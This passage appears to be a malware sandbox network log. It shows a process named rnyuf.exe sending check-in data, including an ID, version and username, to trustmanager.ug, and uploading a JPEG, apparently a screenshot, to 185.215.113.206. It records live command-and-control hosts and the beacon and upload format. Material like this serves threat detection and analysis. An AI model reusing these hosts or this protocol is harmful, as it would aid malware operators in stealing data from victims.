6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:10.149725914 CEST	17379	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.2.3	49839	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:10.161962986 CEST	17380	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:10.188766003 CEST	17382	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:10.188788891 CEST	17382	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.2.3	49840	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:10.213541031 CEST	17382	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:10.213629007 CEST	17382	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:10.213818073 CEST	17392	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:10.213913918 CEST	17395	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:10.270328999 CEST	17398	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:10.270602942 CEST	17403	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:10.270642042 CEST	17406	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:10.270872116 CEST	17411	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:10.271162033 CEST	17415	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:10.271437883 CEST	17418	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:10.271806002 CEST	17421	OUT	Data Raw: ce 7f da 35 e7 65 0b de 99 ef 67 2e fe cf d0 f4 2b 2e 3e 1d c1 f5 1f ce b9 99 2b a4 b4 38 f8 77 6d ee 7f ad 72 f2 b9 04 fb 56 98 45 ef 4f d5 9c 99 9b b2 87 a2 22 72 41 e0 d2 09 64 1d 1c 8f c6 90 9c d3 6b d1 b2 3c 1e 67 7d 09 d6 ee 55 fe 2c fd 69 Data Ascii: 5eg.+.>+8wmrVEO"rAdk<g}U,ikSUhY.m$c)ci'lT4;kfR}8h/j'ic>pPU\ <M?m%6M=#VmlF\|U}b=Jg3EoISUd.S{U}D[.
Aug 23, 2021 02:09:11.040642023 CEST	17502	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.2.3	49841	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:10.349934101 CEST	17446	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:10.375735044 CEST	17447	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:10.375777006 CEST	17448	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
116	192.168.2.3	49842	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:10.511132002 CEST	17484	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:10.539769888 CEST	17486	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 